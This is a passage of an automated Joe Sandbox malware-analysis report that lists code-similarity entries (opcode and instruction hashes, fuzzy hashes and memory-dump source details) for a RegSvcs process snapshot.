                                                                                                                              • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                              • Instruction ID: f723b973a9be5da7bdb51a4e200774448ddd445828c01930f42c5ed026e4d67c
                                                                                                                              • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                                              • Instruction Fuzzy Hash: AD11E5752016C29BEB23AB6CC954BAA7B95EB01B44F1900ABDE4197772F33CC847D261
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                              • Instruction ID: c425d892e8401449def7d6444e14cd54014cbdad2e53862e0d233111c9db69fe
                                                                                                                              • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                                              • Instruction Fuzzy Hash: 85012232240105AFE7219F5ACC08F5B7AE9EF55752F09846BEA04AB270E771DD40C790
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                              • Instruction ID: c08a5e338554998b078c6ff8ca11736cb7dd685766a86dea2c9697851aeb9ae6
                                                                                                                              • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                                                              • Instruction Fuzzy Hash: B1012631404722AFCB718F19E841A337BA8EF557A07108A2EFC958B3A2C331D401CB60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 311094f3f12f73bf660af17b579a28d0a8e158c405c710bbdda4459450ae577d
                                                                                                                              • Instruction ID: a03e9e2f1941688c7200cac313d63b49317eb2fe6d84cd2c37b05047acabf946
                                                                                                                              • Opcode Fuzzy Hash: 311094f3f12f73bf660af17b579a28d0a8e158c405c710bbdda4459450ae577d
                                                                                                                              • Instruction Fuzzy Hash: E801D2735416119FC332DF1DD840E56BBA8FBD1770B254269E9A99F1A6E730D801CBD0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0432b8474ab0d8df6b2136fd550322c5c16a3f76ed08ebcacb485ab7c13a1112
                                                                                                                              • Instruction ID: 8940e23061a3b5fb1dda96847c5563646f6c419685795e1f8fc7f83b9c6b1046
                                                                                                                              • Opcode Fuzzy Hash: 0432b8474ab0d8df6b2136fd550322c5c16a3f76ed08ebcacb485ab7c13a1112
                                                                                                                              • Instruction Fuzzy Hash: 2C11A136241241EFDB15EF1ACDA0F567BB8FF64B44F1000AAE9059F661C235ED01CA90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 428bff690a0527d6fadc0f6ca3fd99ad43e84d901def88485c314abf4065f990
                                                                                                                              • Instruction ID: 254e4735d30e2544458b8faf6c8ee06a271979c41c5bcd4f49b700b84486686e
                                                                                                                              • Opcode Fuzzy Hash: 428bff690a0527d6fadc0f6ca3fd99ad43e84d901def88485c314abf4065f990
                                                                                                                              • Instruction Fuzzy Hash: CB119E70541218ABDB25AF25CC41FE9B278AB24710F9141DAA314A61F0D6709E81DF85
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1debc8343f622c82b8b7749b58ca8fc0b4c13550de0f1013754267c021e95a14
                                                                                                                              • Instruction ID: 17c19346508428f0c97025dd47fb0b99ca7c77484001192df686a6d3c993d359
                                                                                                                              • Opcode Fuzzy Hash: 1debc8343f622c82b8b7749b58ca8fc0b4c13550de0f1013754267c021e95a14
                                                                                                                              • Instruction Fuzzy Hash: 41112D73900119ABCB11DB95CC84DDFBBBCEF58254F054166E906E7211EA34EA15CBE0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                              • Instruction ID: 44b40156d417dfbacdf3b7a980be05de48ca72317df1a5e0f61738d1c7b7a49d
                                                                                                                              • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                              • Instruction Fuzzy Hash: BC01F572600101ABEF119E5DD880E93776ABFD4704F1544ABEE058F366DAB1C881C3A1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2522908d7f7598ea0067c0348ef797dddb9d82bde12456c55aed290b20dc83aa
                                                                                                                              • Instruction ID: 738031537ebc128df56e8c4daae3ecae2b2a046618b95ac3f4c2157357d92d94
                                                                                                                              • Opcode Fuzzy Hash: 2522908d7f7598ea0067c0348ef797dddb9d82bde12456c55aed290b20dc83aa
                                                                                                                              • Instruction Fuzzy Hash: 67F0F932741610BBC7319F578C40F877EADEB94B94F00442EA60A97620C670ED01C7A1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                              • Instruction ID: 971d9414b3c544a41643cfe3d0068577a7c5bec5c3def23b10cade401cb6756d
                                                                                                                              • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                              • Instruction Fuzzy Hash: 0CF0C2F2600611ABD324DF8EDC40E97FBEEDBE1A90F058529A645CB320EA31DD05CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c5081c8b864f3888504fed7f9863c2d8a1acc7bbcce97e28b3f9a1f96af05fe7
                                                                                                                              • Instruction ID: 50c056683228ff26365f5c5e640669f71d9538825d4a46c6037025576d70c65b
                                                                                                                              • Opcode Fuzzy Hash: c5081c8b864f3888504fed7f9863c2d8a1acc7bbcce97e28b3f9a1f96af05fe7
                                                                                                                              • Instruction Fuzzy Hash: B6014471A10209EFDB04DFA9D55199EB7F8FF58304F15405EF914EB350D7749A019BA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                              • Instruction ID: 085338c9421c196586a55926c4b5d56cba5c2079f572ad31fb2e9d693bddbee6
                                                                                                                              • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                              • Instruction Fuzzy Hash: AAF0F2731047239BD7721B9A44C0B6B669D8FE1A64F150037EA0557263C9718D0296D1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 52490820a5f77caaa1530b1de51f9eaadde343a93507df035ac77628715b6e20
                                                                                                                              • Instruction ID: d94d8701ba54293329a6dc1079a50e6015017a7854e334568342dae93d392d38
                                                                                                                              • Opcode Fuzzy Hash: 52490820a5f77caaa1530b1de51f9eaadde343a93507df035ac77628715b6e20
                                                                                                                              • Instruction Fuzzy Hash: 7F018471A00209EFCB04DFA9D4519AEB7F8FF68300F11405AF904EB351D774AA01CBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8626a26a5a54c8f588860d97b5cc4883b70cf2ea3d9229b4d565dbe495a9a8bb
                                                                                                                              • Instruction ID: 51b5e0864f9082577b26c189e619c8a7e5d31d25d87bc48e60a29675d2b47eea
                                                                                                                              • Opcode Fuzzy Hash: 8626a26a5a54c8f588860d97b5cc4883b70cf2ea3d9229b4d565dbe495a9a8bb
                                                                                                                              • Instruction Fuzzy Hash: 390184B1A00209EFDB00DFA9D4419AEB7F8FF58300F51405AF914EB350D7749E018BA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                              • Instruction ID: b0af05ebdbc0c6e6c4942c97dcfe157b0f5e19645e708406c49550c547172f84
                                                                                                                              • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                              • Instruction Fuzzy Hash: C901F4322006869BEB22D75DC849FAABFD8EF51750F0840BBFA048B7B1E778C801C211
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2db87d6ad216006333973a270585705c825e145be2eb9a900fb18dc540f23ae9
                                                                                                                              • Instruction ID: a02e03aaeb92adfa45524e6b8378dd5f032fccfca162e045aafe7a8eca7d93a4
                                                                                                                              • Opcode Fuzzy Hash: 2db87d6ad216006333973a270585705c825e145be2eb9a900fb18dc540f23ae9
                                                                                                                              • Instruction Fuzzy Hash: 2D018F71A00249ABDB00DFAAD445AEEBBF8BF68310F15005EF500AB290D774EA01CBA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b29de61896fe53e9c52cff301623c9d2c620a11fa110f6910f53b9871f42b4fa
                                                                                                                              • Instruction ID: 781a7ddc2d9365dac0422348469e9986e07685118027d7c10357947764834955
                                                                                                                              • Opcode Fuzzy Hash: b29de61896fe53e9c52cff301623c9d2c620a11fa110f6910f53b9871f42b4fa
                                                                                                                              • Instruction Fuzzy Hash: F7018936110219ABCF129E94D844EDA3FA6FB4C655F068116FE186A220C336D971EB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 34ff34f9b49ad93d69593ca248e7a4f748417700a94f79feda43bde591ce5105
                                                                                                                              • Instruction ID: 941bf7645ea1e95ded927858fa783df7050db007f5a28dace6a1a7fbc8aca86d
                                                                                                                              • Opcode Fuzzy Hash: 34ff34f9b49ad93d69593ca248e7a4f748417700a94f79feda43bde591ce5105
                                                                                                                              • Instruction Fuzzy Hash: 46F02BB23043415BF39495198C81F23369DE7D4651F25802BEF058B7F3EA70DC018B94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c64a10f87da4a9eca54dd0269a3a0ca069e1ed0a573a360a6256cc665a07323a
                                                                                                                              • Instruction ID: a2adde1cc93455cce2fce348d1bf08689eef4d62fa02785aff84b360b0bbcd30
                                                                                                                              • Opcode Fuzzy Hash: c64a10f87da4a9eca54dd0269a3a0ca069e1ed0a573a360a6256cc665a07323a
                                                                                                                              • Instruction Fuzzy Hash: 4E01A4703007819BFB229B2DDD58F263BA4BB50B50F4A0596BA118BBF6EB78D4028610
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                              • Instruction ID: 8bdda86d0b54490e9bfa68bbeb86a97362c16e72fe8656b2aa464d0a301c4b9b
                                                                                                                              • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                              • Instruction Fuzzy Hash: 23F0E935341D1347EB37AAAE9420B6EAB96BFA0910B15252D9701CF6D0DF60D8808780
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                              • Instruction ID: aa055c1037a52f6126552f5f4a91d1d261d748d8d78f9a8d909de038c27758a5
                                                                                                                              • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                              • Instruction Fuzzy Hash: F8F03A336116129BE3319A5EC884F17B7A8BFA5A61F59016AA608AB274C670EC029790
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                              • Instruction ID: 15c294bef84c62b2b4f042c0d421796c333c48ec4eaeea12ac7812151c78ae24
                                                                                                                              • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                              • Instruction Fuzzy Hash: 5CC00179601A428BDF16DA2AD294A8A77E4BB94740F150891E8099BB22E624E802DA21
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2332f6068ba84981fb915f087adb019cb5df7a462cd4de3ec47f0541a5374e5c
                                                                                                                              • Instruction ID: d67ffa8dfd8854f41d55eb65ac1f9f8a573581fe422dcd47c6bcf626a0bb27a6
                                                                                                                              • Opcode Fuzzy Hash: 2332f6068ba84981fb915f087adb019cb5df7a462cd4de3ec47f0541a5374e5c
                                                                                                                              • Instruction Fuzzy Hash: 3A90023160580112914071584CC45864009A7F4301B55C012E0425555CCB248A565771
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 28af359866460ac474421fa3cb7f8b64128b2ac99223464a2d464169454e1b95
                                                                                                                              • Instruction ID: 6368fdfee4bc5d4bf4fb20d53742efdb37d9cb04b396660b9ef17074947bacef
                                                                                                                              • Opcode Fuzzy Hash: 28af359866460ac474421fa3cb7f8b64128b2ac99223464a2d464169454e1b95
                                                                                                                              • Instruction Fuzzy Hash: E490026160150142414071584C444466009A7F5301395C116A0555561CC72889559779
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a158cf215fcc69ea7955b47715b1bed10aba7ae87dbb442e803d301b56907fde
                                                                                                                              • Instruction ID: d4dcabfcb4deb37e3ec7fafd1fbd9009c4c01ef855ec7457684bc2a90452686b
                                                                                                                              • Opcode Fuzzy Hash: a158cf215fcc69ea7955b47715b1bed10aba7ae87dbb442e803d301b56907fde
                                                                                                                              • Instruction Fuzzy Hash: D590023120544942D14071584844A86001997E4305F55C012A0065695DD7358E55BB71
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ab291a0cb142dd9cf5f1902c3c34521872a0721bd99a00301a9bd6d557cc78e4
                                                                                                                              • Instruction ID: 527cfe719914b536bad162d812db3c2a6aa4437425e4f7f39812f8131e50b723
                                                                                                                              • Opcode Fuzzy Hash: ab291a0cb142dd9cf5f1902c3c34521872a0721bd99a00301a9bd6d557cc78e4
                                                                                                                              • Instruction Fuzzy Hash: F490023120140902D1807158484468A000997E5301F95C016A0026655DCB258B597BB1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1b7e0b78305074638ea25549d8d75033566727d002710ce1ea0272c0933f6697
                                                                                                                              • Instruction ID: 3a9dc3b72bc4b10c9f69467f31dca94c82d52e499fc73dd7282d6fba5e06967e
                                                                                                                              • Opcode Fuzzy Hash: 1b7e0b78305074638ea25549d8d75033566727d002710ce1ea0272c0933f6697
                                                                                                                              • Instruction Fuzzy Hash: FA90023120140902D10471584C446C6000997E4301F55C012A6025656ED77589917631
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2a294543268db909fea9c659124219223830bc3fd832f68d0b783cf94dbf5883
                                                                                                                              • Instruction ID: 9b9fe3da5e6afe599706d70c652b4cb12ac064f475b6be101a1ccdf63cd0c931
                                                                                                                              • Opcode Fuzzy Hash: 2a294543268db909fea9c659124219223830bc3fd832f68d0b783cf94dbf5883
                                                                                                                              • Instruction Fuzzy Hash: 9890023160540902D15071584854786000997E4301F55C012A0025655DC7658B557BB1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3702911b316ac6be3cb9c58eb77110c2b294f13867de2a8dd3b3f3a52cf4d898
                                                                                                                              • Instruction ID: ef1594cdc0029d5175007cd9cfeaf8e6e129b01a3e3a4db3733c2bbaf449df62
                                                                                                                              • Opcode Fuzzy Hash: 3702911b316ac6be3cb9c58eb77110c2b294f13867de2a8dd3b3f3a52cf4d898
                                                                                                                              • Instruction Fuzzy Hash: 59900225211401030105B5580B44547004A97E9351355C022F1016551CD73189615631
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f3f9f6e6ebe3f96c10eb5f41ad48981364115ff36b1e20bc81817868ca63aea1
                                                                                                                              • Instruction ID: 1c98c9eb8e0952ace9d4723098bdd5c9e634f273563195ac448fc83143f9ae36
                                                                                                                              • Opcode Fuzzy Hash: f3f9f6e6ebe3f96c10eb5f41ad48981364115ff36b1e20bc81817868ca63aea1
